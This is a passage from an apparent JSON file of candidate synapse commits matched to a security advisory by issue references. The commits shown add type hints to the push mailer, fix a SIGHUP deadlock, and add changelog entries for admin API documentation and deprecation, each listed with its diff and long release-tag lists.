"v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8921, 8921", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8921, 8866", - "relevance": 2 - } - ] - }, - { - "commit_id": "02e588856ae26865cd407dd6302aa3deecffe198", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607343022, - "hunks": 37, - "message": "Add type hints to the push mailer module. (#8882)", - "diff": [ - "diff --git a/changelog.d/8882.misc b/changelog.d/8882.misc", - "new file mode 100644", - "index 000000000..4ff0b94b9", - "--- /dev/null", - "+++ b/changelog.d/8882.misc", - "@@ -0,0 +1 @@", - "+Add type hints to push module.", - "diff --git a/mypy.ini b/mypy.ini", - "index 3c8d30306..7ee0dd4b3 100644", - "--- a/mypy.ini", - "+++ b/mypy.ini", - "@@ -57,2 +57,3 @@ files =", - " synapse/notifier.py,", - "+ synapse/push/mailer.py,", - " synapse/push/pusherpool.py,", - "diff --git a/synapse/push/mailer.py b/synapse/push/mailer.py", - "index 38195c8ee..9ff092e8b 100644", - "--- a/synapse/push/mailer.py", - "+++ b/synapse/push/mailer.py", - "@@ -21,3 +21,3 @@ from email.mime.multipart import MIMEMultipart", - " from email.mime.text import MIMEText", - "-from typing import Iterable, List, TypeVar", - "+from typing import TYPE_CHECKING, Any, Dict, Iterable, List, Optional, TypeVar", - "@@ -29,2 +29,3 @@ from synapse.api.errors import StoreError", - " from synapse.config.emailconfig import EmailSubjectConfig", - "+from synapse.events import EventBase", - " from synapse.logging.context import make_deferred_yieldable", - "@@ -35,3 +36,3 @@ from synapse.push.presentable_names import (", - " )", - "-from synapse.types import UserID", - "+from synapse.types import StateMap, UserID", - " from synapse.util.async_helpers import concurrently_execute", - "@@ -39,2 +40,5 @@ from synapse.visibility import filter_events_for_client", - "+if TYPE_CHECKING:", - "+ from synapse.app.homeserver import HomeServer", - "+", - " logger = logging.getLogger(__name__)", - "@@ -95,3 +99,9 @@ ALLOWED_ATTRS = {", - " class Mailer:", - "- def __init__(self, hs, app_name, template_html, template_text):", - "+ def __init__(", - "+ self,", - "+ hs: \"HomeServer\",", - "+ app_name: str,", - "+ template_html: jinja2.Template,", - "+ template_text: jinja2.Template,", - "+ ):", - " self.hs = hs", - "@@ -110,3 +120,5 @@ class Mailer:", - "- async def send_password_reset_mail(self, email_address, token, client_secret, sid):", - "+ async def send_password_reset_mail(", - "+ self, email_address: str, token: str, client_secret: str, sid: str", - "+ ) -> None:", - " \"\"\"Send an email with a password reset link to a user", - "@@ -114,9 +126,9 @@ class Mailer:", - " Args:", - "- email_address (str): Email address we're sending the password", - "+ email_address: Email address we're sending the password", - " reset to", - "- token (str): Unique token generated by the server to verify", - "+ token: Unique token generated by the server to verify", - " the email was received", - "- client_secret (str): Unique token generated by the client to", - "+ client_secret: Unique token generated by the client to", - " group together multiple email sending attempts", - "- sid (str): The generated session ID", - "+ sid: The generated session ID", - " \"\"\"", - "@@ -138,3 +150,5 @@ class Mailer:", - "- async def send_registration_mail(self, email_address, token, client_secret, sid):", - "+ async def send_registration_mail(", - "+ self, email_address: str, token: str, client_secret: str, sid: str", - "+ ) -> None:", - " \"\"\"Send an email with a registration confirmation link to a user", - "@@ -142,9 +156,9 @@ class Mailer:", - " Args:", - "- email_address (str): Email address we're sending the registration", - "+ email_address: Email address we're sending the registration", - " link to", - "- token (str): Unique token generated by the server to verify", - "+ token: Unique token generated by the server to verify", - " the email was received", - "- client_secret (str): Unique token generated by the client to", - "+ client_secret: Unique token generated by the client to", - " group together multiple email sending attempts", - "- sid (str): The generated session ID", - "+ sid: The generated session ID", - " \"\"\"", - "@@ -166,3 +180,5 @@ class Mailer:", - "- async def send_add_threepid_mail(self, email_address, token, client_secret, sid):", - "+ async def send_add_threepid_mail(", - "+ self, email_address: str, token: str, client_secret: str, sid: str", - "+ ) -> None:", - " \"\"\"Send an email with a validation link to a user for adding a 3pid to their account", - "@@ -170,10 +186,10 @@ class Mailer:", - " Args:", - "- email_address (str): Email address we're sending the validation link to", - "+ email_address: Email address we're sending the validation link to", - "- token (str): Unique token generated by the server to verify the email was received", - "+ token: Unique token generated by the server to verify the email was received", - "- client_secret (str): Unique token generated by the client to group together", - "+ client_secret: Unique token generated by the client to group together", - " multiple email sending attempts", - "- sid (str): The generated session ID", - "+ sid: The generated session ID", - " \"\"\"", - "@@ -196,4 +212,9 @@ class Mailer:", - " async def send_notification_mail(", - "- self, app_id, user_id, email_address, push_actions, reason", - "- ):", - "+ self,", - "+ app_id: str,", - "+ user_id: str,", - "+ email_address: str,", - "+ push_actions: Iterable[Dict[str, Any]],", - "+ reason: Dict[str, Any],", - "+ ) -> None:", - " \"\"\"Send email regarding a user's room notifications\"\"\"", - "@@ -205,3 +226,3 @@ class Mailer:", - "- notifs_by_room = {}", - "+ notifs_by_room = {} # type: Dict[str, List[Dict[str, Any]]]", - " for pa in push_actions:", - "@@ -264,3 +285,5 @@ class Mailer:", - "- async def send_email(self, email_address, subject, extra_template_vars):", - "+ async def send_email(", - "+ self, email_address: str, subject: str, extra_template_vars: Dict[str, Any]", - "+ ) -> None:", - " \"\"\"Send an email with the given information and template text\"\"\"", - "@@ -317,4 +340,9 @@ class Mailer:", - " async def get_room_vars(", - "- self, room_id, user_id, notifs, notif_events, room_state_ids", - "- ):", - "+ self,", - "+ room_id: str,", - "+ user_id: str,", - "+ notifs: Iterable[Dict[str, Any]],", - "+ notif_events: Dict[str, EventBase],", - "+ room_state_ids: StateMap[str],", - "+ ) -> Dict[str, Any]:", - " # Check if one of the notifs is an invite event for the user.", - "@@ -336,3 +364,3 @@ class Mailer:", - " \"link\": self.make_room_link(room_id),", - "- }", - "+ } # type: Dict[str, Any]", - "@@ -367,3 +395,9 @@ class Mailer:", - "- async def get_notif_vars(self, notif, user_id, notif_event, room_state_ids):", - "+ async def get_notif_vars(", - "+ self,", - "+ notif: Dict[str, Any],", - "+ user_id: str,", - "+ notif_event: EventBase,", - "+ room_state_ids: StateMap[str],", - "+ ) -> Dict[str, Any]:", - " results = await self.store.get_events_around(", - "@@ -393,3 +427,5 @@ class Mailer:", - "- async def get_message_vars(self, notif, event, room_state_ids):", - "+ async def get_message_vars(", - "+ self, notif: Dict[str, Any], event: EventBase, room_state_ids: StateMap[str]", - "+ ) -> Optional[Dict[str, Any]]:", - " if event.type != EventTypes.Message and event.type != EventTypes.Encrypted:", - "@@ -434,3 +470,5 @@ class Mailer:", - "- def add_text_message_vars(self, messagevars, event):", - "+ def add_text_message_vars(", - "+ self, messagevars: Dict[str, Any], event: EventBase", - "+ ) -> None:", - " msgformat = event.content.get(\"format\")", - "@@ -447,11 +485,14 @@ class Mailer:", - "- return messagevars", - "-", - "- def add_image_message_vars(self, messagevars, event):", - "+ def add_image_message_vars(", - "+ self, messagevars: Dict[str, Any], event: EventBase", - "+ ) -> None:", - " messagevars[\"image_url\"] = event.content[\"url\"]", - "- return messagevars", - "-", - " async def make_summary_text(", - "- self, notifs_by_room, room_state_ids, notif_events, user_id, reason", - "+ self,", - "+ notifs_by_room: Dict[str, List[Dict[str, Any]]],", - "+ room_state_ids: Dict[str, StateMap[str]],", - "+ notif_events: Dict[str, EventBase],", - "+ user_id: str,", - "+ reason: Dict[str, Any],", - " ):", - "@@ -582,3 +623,3 @@ class Mailer:", - "- def make_room_link(self, room_id):", - "+ def make_room_link(self, room_id: str) -> str:", - " if self.hs.config.email_riot_base_url:", - "@@ -592,3 +633,3 @@ class Mailer:", - "- def make_notif_link(self, notif):", - "+ def make_notif_link(self, notif: Dict[str, str]) -> str:", - " if self.hs.config.email_riot_base_url:", - "@@ -608,3 +649,5 @@ class Mailer:", - "- def make_unsubscribe_link(self, user_id, app_id, email_address):", - "+ def make_unsubscribe_link(", - "+ self, user_id: str, app_id: str, email_address: str", - "+ ) -> str:", - " params = {", - "@@ -622,3 +665,3 @@ class Mailer:", - "-def safe_markup(raw_html):", - "+def safe_markup(raw_html: str) -> jinja2.Markup:", - " return jinja2.Markup(", - "@@ -637,3 +680,3 @@ def safe_markup(raw_html):", - "-def safe_text(raw_text):", - "+def safe_text(raw_text: str) -> jinja2.Markup:", - " \"\"\"", - "@@ -657,3 +700,3 @@ def deduped_ordered_list(it: Iterable[T]) -> List[T]:", - "-def string_ordinal_total(s):", - "+def string_ordinal_total(s: str) -> int:", - " tot = 0" - ], - "changed_files": [ - "changelog.d/8882.misc", - "mypy.ini", - "synapse/push/mailer.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8882": "Add type hints to the push module. #8901 Convert internal pusher dicts to attrs #8940" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8882, 8882", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8882", - "relevance": 2 - } - ] - }, - { - "commit_id": "80a992d7b953ea58dd45913d68855e396ad4d980", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607619365, - "hunks": 3, - "message": "Fix deadlock on SIGHUP (#8918) Fixes #8892", - "diff": [ - "diff --git a/changelog.d/8918.bugfix b/changelog.d/8918.bugfix", - "new file mode 100644", - "index 000000000..ae0f6745d", - "--- /dev/null", - "+++ b/changelog.d/8918.bugfix", - "@@ -0,0 +1 @@", - "+Fix occasional deadlock when handling SIGHUP.", - "diff --git a/synapse/app/_base.py b/synapse/app/_base.py", - "index 895b38ae7..37ecdbe3d 100644", - "--- a/synapse/app/_base.py", - "+++ b/synapse/app/_base.py", - "@@ -247,2 +247,4 @@ def start(hs: \"synapse.server.HomeServer\", listeners: Iterable[ListenerConfig]):", - "+ reactor = hs.get_reactor()", - "+", - " @wrap_as_background_process(\"sighup\")", - "@@ -262,3 +264,5 @@ def start(hs: \"synapse.server.HomeServer\", listeners: Iterable[ListenerConfig]):", - " def run_sighup(*args, **kwargs):", - "- hs.get_clock().call_later(0, handle_sighup, *args, **kwargs)", - "+ # `callFromThread` should be \"signal safe\" as well as thread", - "+ # safe.", - "+ reactor.callFromThread(handle_sighup, *args, **kwargs)" - ], - "changed_files": [ - "changelog.d/8918.bugfix", - "synapse/app/_base.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8918": "", - "8892": "Fix deadlock on SIGHUP #8918" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8918, 8918", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8918, 8892", - "relevance": 2 - } - ] - }, - { - "commit_id": "43bf3c51780a299becde91027e73259eb77b039f", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607530797, - "hunks": 1, - "message": "Combine related media admin API docs (#8839) Related: #8810 Also a few small improvements. Signed-off-by: Dirk Klimpel dirk@klimpel.org", - "diff": [ - "diff --git a/changelog.d/8839.doc b/changelog.d/8839.doc", - "new file mode 100644", - "index 000000000..c35c59a76", - "--- /dev/null", - "+++ b/changelog.d/8839.doc", - "@@ -0,0 +1 @@", - "+Combine related media admin API docs.", - "\\ No newline at end of file" - ], - "changed_files": [ - "changelog.d/8839.doc" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8839": "", - "8810": "Deprecate and remove the Shutdown Room Admin API in favour of the Delete Room API #8663 Deprecate Shutdown Room and Purge Room Admin API #8829 Remove deprecated Shutdown Room and Purge Room Admin API #8830 Combine related media admin API docs #8839" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8839, 8839", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8839, 8810", - "relevance": 2 - } - ] - }, - { - "commit_id": "a5f7aff5e5a840c53e79d185d40b22d67dad2ea1", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607600568, - "hunks": 1, - "message": "Deprecate Shutdown Room and Purge Room Admin API (#8829) Deprecate both APIs in favour of the Delete Room API. Related: #8663 and #8810", - "diff": [ - "diff --git a/changelog.d/8829.removal b/changelog.d/8829.removal", - "new file mode 100644", - "index 000000000..2f3708218", - "--- /dev/null", - "+++ b/changelog.d/8829.removal", - "@@ -0,0 +1 @@", - "+Deprecate Shutdown Room and Purge Room Admin APIs." - ], - "changed_files": [ - "changelog.d/8829.removal" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8829": "Remove deprecated Shutdown Room and Purge Room Admin API #8830 Combine related admin API docs #8810 Switch shutdown_room to delete room API matrix-org/sytest#988 Deprecate and remove the Shutdown Room Admin API in favour of the Delete Room API #8663 Replace shutdown_room and purge_room APIs with delete_room matrix-org/mjolnir#76 remove purge_room and shutdown_room #9052", - "8663": "Allow shutdowns of rooms using the admin api without replacement rooms #8662 Add a way to close/shutdown room as room admin #8717 Deprecate Shutdown Room and Purge Room Admin API #8829 Remove deprecated Shutdown Room and Purge Room Admin API #8830", - "8810": "Deprecate and remove the Shutdown Room Admin API in favour of the Delete Room API #8663 Deprecate Shutdown Room and Purge Room Admin API #8829 Remove deprecated Shutdown Room and Purge Room Admin API #8830 Combine related media admin API docs #8839" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - 